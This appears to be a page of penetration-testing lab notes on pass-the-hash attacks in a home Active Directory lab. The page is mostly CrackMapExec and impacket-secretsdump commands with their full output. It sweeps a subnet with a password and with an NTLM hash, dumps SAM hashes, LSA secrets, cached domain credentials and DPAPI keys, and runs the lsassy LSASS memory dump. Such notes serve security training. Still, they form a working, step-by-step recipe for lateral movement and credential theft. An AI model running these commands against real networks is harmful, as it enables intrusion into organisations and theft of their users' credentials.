Pass the Hash

We can use the password or hash to move literally in the network.

How to get the hash

Metasploit Hashdump

Impacket

Crackmapexec PTH

We can pass a password and sweep the subnet

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u fcastle -d MARVEL.local -p Password1
SMB         192.168.145.138 445    HYDRA-DC         [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False)
SMB         192.168.145.140 445    SPIDERMAN        [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB         192.168.145.139 445    THEPUNISHER      [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB         192.168.145.138 445    HYDRA-DC         [+] MARVEL.local\fcastle:Password1 
SMB         192.168.145.140 445    SPIDERMAN        [+] MARVEL.local\fcastle:Password1 (Pwn3d!)
SMB         192.168.145.139 445    THEPUNISHER      [+] MARVEL.local\fcastle:Password1 (Pwn3d!)

or We can also pass a hash (Works only on NTLM v1 . V2 can be relayed not passed)

Capabilities of crackmapexec

crackmapexec smb -L
(opens the capabilities list it down)

We can dump SAM, LSA or smbshares

crackmapexec smb <target_ip> -u Administrator -p <password> --sam --local-auth
crackmapexec smb <target_ip> -u Administrator -p <password> --lsa --local-auth
crackmapexec smb <target_ip> -u Administrator -p <password> --shares --local-auth

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u fcastle -d MARVEL.local -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --sam     
SMB         192.168.145.138 445    HYDRA-DC         [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:MARVEL.local) (signing:True) (SMBv1:False)
SMB         192.168.145.140 445    SPIDERMAN        [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB         192.168.145.139 445    THEPUNISHER      [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:MARVEL.local) (signing:False) (SMBv1:False)
SMB         192.168.145.138 445    HYDRA-DC         [+] MARVEL.local\fcastle:64f12cddaa88057e06a81b54e73b949b 
SMB         192.168.145.140 445    SPIDERMAN        [+] MARVEL.local\fcastle:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB         192.168.145.139 445    THEPUNISHER      [+] MARVEL.local\fcastle:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB         192.168.145.140 445    SPIDERMAN        [+] Dumping SAM hashes
SMB         192.168.145.139 445    THEPUNISHER      [+] Dumping SAM hashes
SMB         192.168.145.140 445    SPIDERMAN        Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB         192.168.145.140 445    SPIDERMAN        Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.145.139 445    THEPUNISHER      Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB         192.168.145.139 445    THEPUNISHER      Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.145.140 445    SPIDERMAN        DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.145.140 445    SPIDERMAN        WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6c42d69c9d60ac3c1412febf3d04ca76:::
SMB         192.168.145.139 445    THEPUNISHER      DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.145.140 445    SPIDERMAN        peterparker:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB         192.168.145.140 445    SPIDERMAN        [+] Added 5 SAM hashes to the database
SMB         192.168.145.139 445    THEPUNISHER      WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb:::
SMB         192.168.145.139 445    THEPUNISHER      frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
SMB         192.168.145.139 445    THEPUNISHER      [+] Added 5 SAM hashes to the database

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --local-auth --shares
SMB         192.168.145.139 445    THEPUNISHER      [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:THEPUNISHER) (signing:False) (SMBv1:False)
SMB         192.168.145.138 445    HYDRA-DC         [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:HYDRA-DC) (signing:True) (SMBv1:False)
SMB         192.168.145.140 445    SPIDERMAN        [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:SPIDERMAN) (signing:False) (SMBv1:False)
SMB         192.168.145.139 445    THEPUNISHER      [+] THEPUNISHER\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB         192.168.145.138 445    HYDRA-DC         [-] HYDRA-DC\administrator:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE 
SMB         192.168.145.140 445    SPIDERMAN        [+] SPIDERMAN\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB         192.168.145.139 445    THEPUNISHER      [+] Enumerated shares
SMB         192.168.145.139 445    THEPUNISHER      Share           Permissions     Remark
SMB         192.168.145.139 445    THEPUNISHER      -----           -----------     ------
SMB         192.168.145.139 445    THEPUNISHER      ADMIN$          READ,WRITE      Remote Admin
SMB         192.168.145.139 445    THEPUNISHER      C$              READ,WRITE      Default share
SMB         192.168.145.139 445    THEPUNISHER      IPC$            READ            Remote IPC
SMB         192.168.145.140 445    SPIDERMAN        [+] Enumerated shares
SMB         192.168.145.140 445    SPIDERMAN        Share           Permissions     Remark
SMB         192.168.145.140 445    SPIDERMAN        -----           -----------     ------
SMB         192.168.145.140 445    SPIDERMAN        ADMIN$          READ,WRITE      Remote Admin
SMB         192.168.145.140 445    SPIDERMAN        C$              READ,WRITE      Default share
SMB         192.168.145.140 445    SPIDERMAN        IPC$            READ            Remote IPC

Dumping Memory

crackmapexec smb <target_ip> -u <username> -p <password> -M lsassy -o METHOD=nanodump

🔍 `--lsa` in CrackMapExec

Purpose: Dumps LSA secrets from the registry, such as:

Stored service account passwords
Cached domain credentials
Auto-logon passwords
Scheduled task creds

Mechanism: This is a registry read, not a memory dump. It does not touch LSASS directly.

Command Example:

bashCopyEditcrackmapexec smb <target_ip> -u <username> -p <password> --lsa

Requires:

Administrator privileges
Access to registry remotely

Output Example:

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --local-auth --lsa   
SMB         192.168.145.139 445    THEPUNISHER      [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:THEPUNISHER) (signing:False) (SMBv1:False)
SMB         192.168.145.138 445    HYDRA-DC         [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:HYDRA-DC) (signing:True) (SMBv1:False)
SMB         192.168.145.140 445    SPIDERMAN        [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:SPIDERMAN) (signing:False) (SMBv1:False)
SMB         192.168.145.139 445    THEPUNISHER      [+] THEPUNISHER\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB         192.168.145.138 445    HYDRA-DC         [-] HYDRA-DC\administrator:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE 
SMB         192.168.145.140 445    SPIDERMAN        [+] SPIDERMAN\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB         192.168.145.139 445    THEPUNISHER      [+] Dumping LSA secrets
SMB         192.168.145.140 445    SPIDERMAN        [+] Dumping LSA secrets
SMB         192.168.145.139 445    THEPUNISHER      MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-14 05:44:23)
SMB         192.168.145.139 445    THEPUNISHER      MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-14 07:44:02)
SMB         192.168.145.140 445    SPIDERMAN        MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-14 07:53:16)
SMB         192.168.145.140 445    SPIDERMAN        MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-16 06:49:57)
SMB         192.168.145.140 445    SPIDERMAN        MARVEL.LOCAL/pparker:$DCC2$10240#pparker#9f28ff35b303d014c9e85e35ab47d019: (2025-05-16 07:00:00)
SMB         192.168.145.139 445    THEPUNISHER      MARVEL\THEPUNISHER$:aes256-cts-hmac-sha1-96:6a98901004c69df5467cd869f4ea7c1f0e5f3d8848a9549a5aa9b7ba3b3150e4
SMB         192.168.145.140 445    SPIDERMAN        MARVEL\SPIDERMAN$:aes256-cts-hmac-sha1-96:c131c1e90e95f1b416556a534b8cb0ee62dd96cc145c46b0eb6d11f73eb1a5d1
SMB         192.168.145.139 445    THEPUNISHER      MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:ec537eb458177012db5ab7997afd825b
SMB         192.168.145.139 445    THEPUNISHER      MARVEL\THEPUNISHER$:des-cbc-md5:cd4af415fb927af4
SMB         192.168.145.139 445    THEPUNISHER      MARVEL\THEPUNISHER$:plain_password_hex:660056004b006300470078004000550048004f00570027007200250059002c002600720020006c00500024005e003a005900580058004e005d006700750041002c002d00590030004400640043002f0037007000480065004400660044005600670067005f00290068007a00570037006a002a003200330075003e00750066004400320064007100700035003600710059003d004f00580055005d0065003d0051002f0059006e00690029002f00590020002d006100270069002c003700550047003500570030005d0056002e00780074004e007a003900450071003f0072006e0045004200300058002c0028006f00                                                                                                                                         
SMB         192.168.145.139 445    THEPUNISHER      MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:b5458f32b6a10e8482ae7a582f776ab0:::
SMB         192.168.145.139 445    THEPUNISHER      dpapi_machinekey:0x6174875d29cb646655e1dd49c2853691667f78f2
dpapi_userkey:0xa4d2daa834d71945360ce5b8ac5efcf2a02a9c28                                                                                                                                                                                    
SMB         192.168.145.139 445    THEPUNISHER      NL$KM:099fc6f660ef093e30cc5baac7ac5afbca6147502d62b136d659692f82cb81ded820bf99ba900c47109e8ecbf501e2f00c9cfc1abfad667b0311daa4dfcd6063
SMB         192.168.145.139 445    THEPUNISHER      [+] Dumped 9 LSA secrets to /home/kali/.cme/logs/THEPUNISHER_192.168.145.139_2025-05-20_232936.secrets and /home/kali/.cme/logs/THEPUNISHER_192.168.145.139_2025-05-20_232936.cached
SMB         192.168.145.140 445    SPIDERMAN        MARVEL\SPIDERMAN$:aes128-cts-hmac-sha1-96:8234a83db77e524d118254a404aa48b2
SMB         192.168.145.140 445    SPIDERMAN        MARVEL\SPIDERMAN$:des-cbc-md5:61c2c129effe1ab3
SMB         192.168.145.140 445    SPIDERMAN        MARVEL\SPIDERMAN$:plain_password_hex:a2c5160c8c59c6a5e7ef3f304d110706f4365b36debbb27afdd4e37eadabe6443cb79031a728372c0d53558b1275186299aa74515f8c2f839527b86a1e3ef3e7d36273ab39c3117fe8d8c5acf02121b8cb5731bc8b99ec7752fc9bcfd8d78d4886ab65e6596a5cc60f9f86b5eeccdcddc7f5427ded633d50590f5bb16bb24d5ebaae02fc03afad34c6ec421293c3485d59271a713c1f008d4dbd889166d642b89fd6922404566532d775cd5a25a91d770fb8cbf4eca57c45e82b0b05fa33825e5fc47915705f187895da756590e30b45fefb4a348fc33bad9efec57e07c537f7d93689582c4be10f8218dc05b7980a03                                                                                                                                           
SMB         192.168.145.140 445    SPIDERMAN        MARVEL\SPIDERMAN$:aad3b435b51404eeaad3b435b51404ee:8e5314ef4d8a661d84f21118e80ecc9a:::
SMB         192.168.145.140 445    SPIDERMAN        dpapi_machinekey:0x6380f87fdc42b92f622c31e7145a2fab193d5341
dpapi_userkey:0x4214531dfc2db4013de58ed96a7b088c7fbbb6e9                                                                                                                                                                                    
SMB         192.168.145.140 445    SPIDERMAN        NL$KM:b47d88cd15dd2f727f1e5dbbb6086ac5085d53578924e84553154bf44d1483a6a877696579c58b9be2d2adfc665199da58447bb258affaa8c543903649ee4f4d
SMB         192.168.145.140 445    SPIDERMAN        [+] Dumped 10 LSA secrets to /home/kali/.cme/logs/SPIDERMAN_192.168.145.140_2025-05-20_232936.secrets and /home/kali/.cme/logs/SPIDERMAN_192.168.145.140_2025-05-20_232936.cached

🧠 `-M lsassy` Module

Purpose: Dumps live credentials from LSASS memory, including:

Cleartext passwords
NTLM hashes
Kerberos tickets

Mechanism: Runs a memory dump using a method like procdump, comsvcs, or nanodump, then parses it using lsassy.

Command Example:

bashCopyEditcrackmapexec smb <target_ip> -u <username> -p <password> -M lsassy

Requires:

Administrator privileges
Ability to execute dump remotely
AV/EDR may block it

Output Example:

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 192.168.145.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b --local-auth -M lsassy
SMB         192.168.145.138 445    HYDRA-DC         [*] Windows Server 2022 Build 20348 x64 (name:HYDRA-DC) (domain:HYDRA-DC) (signing:True) (SMBv1:False)
SMB         192.168.145.139 445    THEPUNISHER      [*] Windows 10 / Server 2019 Build 19041 x64 (name:THEPUNISHER) (domain:THEPUNISHER) (signing:False) (SMBv1:False)
SMB         192.168.145.140 445    SPIDERMAN        [*] Windows 10 / Server 2019 Build 19041 x64 (name:SPIDERMAN) (domain:SPIDERMAN) (signing:False) (SMBv1:False)
SMB         192.168.145.138 445    HYDRA-DC         [-] HYDRA-DC\administrator:64f12cddaa88057e06a81b54e73b949b STATUS_LOGON_FAILURE 
SMB         192.168.145.139 445    THEPUNISHER      [+] THEPUNISHER\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)
SMB         192.168.145.140 445    SPIDERMAN        [+] SPIDERMAN\administrator:64f12cddaa88057e06a81b54e73b949b (Pwn3d!)

CrackMapExec database

Keeps record of all cracked user accounts

┌──(kali㉿kali)-[~]
└─$ cmedb
cmedb (default)(smb) > creds

+Credentials---------+-----------+-------------+--------------------+-------------------------------------------------------------------+
| CredID | Admin On  | CredType  | Domain      | UserName           | Password                                                          |
+--------+-----------+-----------+-------------+--------------------+-------------------------------------------------------------------+
| 1      | 2 Host(s) | plaintext | MARVEL      | fcastle            | Password1                                                         |
| 2      | 0 Host(s) | hash      | THEPUNISHER | Administrator      | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b |
| 3      | 0 Host(s) | hash      | SPIDERMAN   | Administrator      | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b |
| 4      | 0 Host(s) | hash      | THEPUNISHER | Guest              | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 |
| 5      | 0 Host(s) | hash      | SPIDERMAN   | Guest              | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 |
| 6      | 0 Host(s) | hash      | THEPUNISHER | DefaultAccount     | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 |
| 7      | 0 Host(s) | hash      | SPIDERMAN   | DefaultAccount     | aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 |
| 8      | 0 Host(s) | hash      | THEPUNISHER | WDAGUtilityAccount | aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb |
| 9      | 0 Host(s) | hash      | SPIDERMAN   | WDAGUtilityAccount | aad3b435b51404eeaad3b435b51404ee:6c42d69c9d60ac3c1412febf3d04ca76 |
| 10     | 0 Host(s) | hash      | THEPUNISHER | frankcastle        | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b |
| 11     | 0 Host(s) | hash      | SPIDERMAN   | peterparker        | aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b |
| 12     | 2 Host(s) | hash      | MARVEL      | fcastle            | 64f12cddaa88057e06a81b54e73b949b                                  |
+--------+-----------+-----------+-------------+--------------------+-------------------------------------------------------------------+

Dumping Hashes

Secrets Dump

Dumps SAM as well as other secrets from registry

impacket-secretsdump 'MARVEL.local/fcastle:[email protected]'

Secrets Dump from Hash

┌──(kali㉿kali)-[~]
└─$ impacket-secretsdump 'MARVEL.local/fcastle:[email protected]'                

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xec9be313e502a2aa71fd4e8e4c9999d5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:6578f05068adb3e4a16d3253bd46bacb:::
frankcastle:1001:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b:::
[*] Dumping cached domain logon information (domain/username:hash)
MARVEL.LOCAL/fcastle:$DCC2$10240#fcastle#e6f48c2526bd594441d3da3723155f6f: (2025-05-14 05:44:23)
MARVEL.LOCAL/Administrator:$DCC2$10240#Administrator#c7154f935b7d1ace4c1d72bd4fb7889c: (2025-05-14 07:44:02)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
MARVEL\THEPUNISHER$:aes256-cts-hmac-sha1-96:6a98901004c69df5467cd869f4ea7c1f0e5f3d8848a9549a5aa9b7ba3b3150e4
MARVEL\THEPUNISHER$:aes128-cts-hmac-sha1-96:ec537eb458177012db5ab7997afd825b
MARVEL\THEPUNISHER$:des-cbc-md5:cd4af415fb927af4
MARVEL\THEPUNISHER$:plain_password_hex:660056004b006300470078004000550048004f00570027007200250059002c002600720020006c00500024005e003a005900580058004e005d006700750041002c002d00590030004400640043002f0037007000480065004400660044005600670067005f00290068007a00570037006a002a003200330075003e00750066004400320064007100700035003600710059003d004f00580055005d0065003d0051002f0059006e00690029002f00590020002d006100270069002c003700550047003500570030005d0056002e00780074004e007a003900450071003f0072006e0045004200300058002c0028006f00
MARVEL\THEPUNISHER$:aad3b435b51404eeaad3b435b51404ee:b5458f32b6a10e8482ae7a582f776ab0:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x6174875d29cb646655e1dd49c2853691667f78f2
dpapi_userkey:0xa4d2daa834d71945360ce5b8ac5efcf2a02a9c28
[*] NL$KM 
 0000   09 9F C6 F6 60 EF 09 3E  30 CC 5B AA C7 AC 5A FB   ....`..>0.[...Z.
 0010   CA 61 47 50 2D 62 B1 36  D6 59 69 2F 82 CB 81 DE   .aGP-b.6.Yi/....
 0020   D8 20 BF 99 BA 90 0C 47  10 9E 8E CB F5 01 E2 F0   . .....G........
 0030   0C 9C FC 1A BF AD 66 7B  03 11 DA A4 DF CD 60 63   ......f{......`c
NL$KM:099fc6f660ef093e30cc5baac7ac5afbca6147502d62b136d659692f82cb81ded820bf99ba900c47109e8ecbf501e2f00c9cfc1abfad667b0311daa4dfcd6063
[*] Cleaning up... 
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistry

Pass the Hash with Mimikatz

PreviousPass Attacks NextPass the Ticket

Last updated 4 months ago